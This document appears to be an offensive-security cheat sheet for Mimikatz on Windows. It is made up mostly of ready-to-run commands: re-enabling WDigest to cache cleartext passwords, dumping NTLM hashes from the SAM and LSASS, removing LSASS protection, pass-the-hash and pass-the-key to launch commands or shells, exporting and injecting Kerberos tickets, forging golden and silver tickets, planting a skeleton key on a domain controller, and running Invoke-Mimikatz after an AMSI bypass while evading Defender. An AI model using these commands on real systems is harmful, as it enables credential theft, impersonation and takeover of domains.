Mimikatz needs to be run with administrative privileges (on the local machine), and provides its own command prompt.

  • Use the privilege::debug command to check if you’re running with the right privileges.
  • Use log $FILENAME to log all output.

Dumping cleartext passwords

The WDigest process caches cleartext passwords for recently logged in users. Or at least it used to. This behavior is disabled on modern Windows systems, but can be re-enabled by a single registry edit:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Once this is set, Mimikatz can dump any cleartext passwords that WDigest caches. (Obviously, this only applies to logins made after the registry key above is set.)

privilege::debug
token::elevate
sekurlsa::wdigest

Note that accounts in the “Protected Users” group will not have their credentials cached, even with the above registry hack.

Pass the hash

NLTM hashes in LSASS memory - NLTM hashes in the local SAM = NLTM hashes for domain users!

Local SAM

This provides NLTM hashes for local users:

privilege::debug
token::elevate
lsadump::sam

LSASS memory

This provides NLTM hashes for recently logged in users:

privilege::debug
token::elevate
sekurlsa::msv

Cached passwords are dumped as plain text, instead of NTHashes.

The LSASS process can be protected against memory-based attacks. This protection can be bypassed by loading the mimidrv.sys driver and then executing !processprotect /process:lsass.exe /remove from within the Mimikatz shell.

Inject an NTLM hash into a process

Commands (including reverse shells, if the necessary binaries/scripts are available) can be launched from Mimikatz using the extracted NTLM hash for authentication. Note that this doesn’t work if your privileges are elevated (weird, right?), hence the initial token::revert command:

token::revert
sekurlsa::pth /user:$TARGET_USER /domain:$TARGET_DOMAIN /ntlm:$TARGET_USER_NTLM_HASH /run:"$FULL_COMMAND_INCLUDING_ARGUMENTS"

The shell produced in this way is a bit weird, as it is actually running as the user that launched Mimikatz (which will show up if you call whoami, though the privileges will be those of the $TARGET_USER.

A number of Linux commands can also take NLTM hashes instead of passwords, such as XFreeRDP, Impacket’s PsExec, and Evil-WinRM.

Dumping Kerberos tickets

Mimikatz can dump ticket granting tickets (and session keys) from the memory of Windows’ Local Security Authority Subsystem Service (LSASS); these can then be used to for privilege elevation or lateral movement (depending on which users are active on that machine).

Use the sekurlsa::tickets /export command to dump any Kerberos “tickets” (really ticket + session key data structures) from LSASS’s memory as .kirbi files. Tickets are named like ID-USER-SERVICE-DOMAIN.kirbi; ticket granting tickets have a krbtgt SERVICE name. If you can find a krbtgt ticket belonging to an administrator account, then you’ve (almost) struck gold.

Pass the ticket attacks

Mimikatz can extract Kerberos TGT/TGS tickets and session keys:

privilege::debug
sekurlsa::tickets /export

Note that TGTs for all users are available if you can run as SYSTEM; these allow TGS tickets to be requested for any service the corresponding user has access to. If you’re not running as SYSTEM, then you can get TGS tickets for the current user, which will give you access to those services the current user has permission to use (and has accessed recently).

Mimikatz can then inject tickets into the current session:

kerberos::ptt $KIRBI_FILENAME_FOR_TICKET_TO_INJECT

This allows the account you’re logged in as to (automatically!) “pass the ticket” and impersonate the user whose ticket you’ve harvested. The Windows built-in command klist will provide a list of currently active tickets.

Golden and silver ticket attacks

To generate Kerberos golden and silver tickets using Mimikatz, begin by running the lsadump::lsa /inject /name:$SERVICE command to retrieve the service SID and NTLM password hash for that service. If SERVICE is krbtgt then this will allow the creation of a golden ticket, otherwise you’ll be creating a silver ticket.

(You can also use a user name instead of $SERVICE, in which case it appears that Mimikatz will just request a ticket granting ticket from the KDC as that user in the next step; this is theoretically just as noisy as a golden ticket, but looks more “normal”.)

To actually create and cache the ticket, use Kerberos::golden /user:$USER /domain:$DOMAIN /sid:$SID /krbtgt:$HASH /id:$TYPE, where:

  • $USER is the user to create the ticket for (probably the one you’ve compromised).
  • $DOMAIN is the domain to create the ticket for.
  • $SID is the SID of the service from the previous step.
  • $HASH is the NT hash of the service password from the previous step.
  • $TYPE is the type of Kerberos ticket to create; use 500 for a golden (ticket granting) ticket, and 1103 for a service ticket.

Once the ticket has been created, use misc::cmd to open a command prompt using the newly forged ticket.

Pass the key attacks

“Pass the key” attacks rely on the fact that Kerberos TGTs are granted based on an encrypted timestamp, so if we can get access to these objects we can request TGTs as the corresponding user. Turns out that these also hang out in memory and can be extracted with Mimikatz:

privilege::debug
sekurlsa::ekeys

These keys can be injected into a command environment just like an NTLM hash, though you need to know how they’re encrypted. For example, for an AES256 encrypted key:

token::revert
sekurlsa::pth /user:$TARGET_USER /domain:$TARGET_DOMAIN /aes256:$TARGET_USER_KERBEROS_KEY /run:"$FULL_COMMAND_INCLUDING_ARGUMENTS"

Other options include /aes128 and /rc4 for those styles of encryption, though RC4 isn’t something that you’re likely to see as it’s weak and disabled by default. (Because of a historical quirk, the RC4 key is actually not a timestamp, but rather the user’s NTLM hash. So iff RC4 is enabled on a domain, then extracting a user’s NTLM hash is sufficient to request Kerberos TGTs as that user!)

KDC skeleton key

If Mimikatz is run on a domain controller, it can modify the authentication service’s memory using the misc::skeleton command to cause it to attempt to decrypt the AS-REQ using both the user’s NT hash and an NT hash of your choosing (by default 60BA4FCADC466C7A033C178194C03DF6, which is just mimikatz). This means that you can send an AS-REQ as any user using the “skeleton key” hash to gain access as that user, similar to a golden ticket attack.

Obviously this isn’t very persistent itself, as the skeleton key will be lost if the server is rebooted or the authentication service restarted.

Other implementations

meterpreter

Call Mimikatz from a meterpreter shell

Use load kiwi to load up Mimikatz. Sub-commands:

kerberos         # Attempt to retrieve kerberos creds
livessp          # Attempt to retrieve livessp creds
mimikatz_command # Run a custom commannd
msv              # Attempt to retrieve msv creds (hashes)
ssp              # Attempt to retrieve ssp creds
tspkg            # Attempt to retrieve tspkg creds
wdigest          # Attempt to retrieve wdigest creds
Link to original

Pure PowerShell implementation

Invoke-Mimikatz

Mimikatz binaries are generally detected by AV on download these days, but fortunately there’s a PowerShell re-implementation available from the Empire Project that can be run after bypassing AMSI.

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt

Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file.

Link to original